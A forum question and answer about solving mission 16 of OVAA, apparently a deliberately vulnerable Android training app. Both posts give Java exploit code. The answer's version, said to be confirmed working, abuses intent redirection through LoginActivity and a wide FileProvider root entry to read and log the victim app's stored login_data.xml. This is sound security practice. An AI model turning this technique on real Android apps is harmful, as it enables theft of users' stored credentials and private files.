# Leaking data with android Content Provider with implicit intent

Tags: android, android-studio, debugging, android-fragments, android-security

There is a vulnerable App to practice Android Security. [Link Here](https://github.com/oversecured/ovaa) And I am stucked at its 16 mission.

**16. Use of very wide file sharing declaration for oversecured.ovaa.fileprovider content provider in root entry.**

I tried hard to solve it But couldn't do it still. Here is my code

MainActivity.Java

```
public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

       Intent extra = new Intent(Intent.ACTION_VIEW);
        extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION );
        extra.setClassName(getPackageName(), "com.exploit.app.LeakActivity");
        extra.setType("text/xml");
        extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"));

        Intent intent = new Intent();
        intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
        intent.putExtra("redirect_intent", extra);
        startActivity(intent);
    }
}
```

LeakActivity.java

```
public class LeakActivity extends MainActivity {
        InputStream i = getContentResolver().openInputStream(getIntent().getData()); 

    public LeakActivity() throws FileNotFoundException {
    }
}
```

AndroidManifest.xml

```
    <activity android:name=".MainActivity">
        <intent-filter>
            <action android:name="android.intent.action.MAIN" />
            <category android:name="android.intent.category.LAUNCHER" />
        </intent-filter>
    </activity>
    <activity android:name=".LeakActivity" />
```

*Thank You*

Answer (score 0):

I verified, the confirmed the below provided code is working for me:

MainActivity.java

```
public class MainActivity extends AppCompatActivity {
private Button button;
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    button = (Button) findViewById(R.id.button);
    button.setOnClickListener(new View.OnClickListener(){
        @Override
        public void onClick(View v){
            Intent extra = new Intent();
            extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
                    | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
                    | Intent.FLAG_GRANT_READ_URI_PERMISSION
                    | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
            extra.setClassName(getPackageName(), "com.example.fileleaker.Leaker");
            extra.setData(Uri.parse("content://oversecured.ovaa.fileprovider/"));

            Intent intent = new Intent();
            intent.setClassName("oversecured.ovaa", "oversecured.ovaa.activities.LoginActivity");
            intent.putExtra("redirect_intent", extra);
            startActivity(intent);
        }
    });
  }
}
```

Leaker.java

```
public class Leaker extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_leaker);

        Uri uri = Uri.parse(getIntent().getDataString() + "root/data/data/oversecured.ovaa/shared_prefs/login_data.xml"); // content://com.victim.provider/image/1

        try {
            InputStream i = getContentResolver().openInputStream(uri); // stolen image
            //creating an InputStreamReader object
            InputStreamReader isReader = new InputStreamReader(i);
            //Creating a BufferedReader object
            BufferedReader reader = new BufferedReader(isReader);
            StringBuffer sb = new StringBuffer();
            String str;
            while((str = reader.readLine())!= null){
                Log.v("Hello","=======File__DATA======="+str+"==========");
            }
        }catch (FileNotFoundException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
```

AndroidManifest.xml

```
<activity android:name=".Leaker">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
    </intent-filter>
</activity>
<activity android:name=".MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
    </intent-filter>
</activity>
```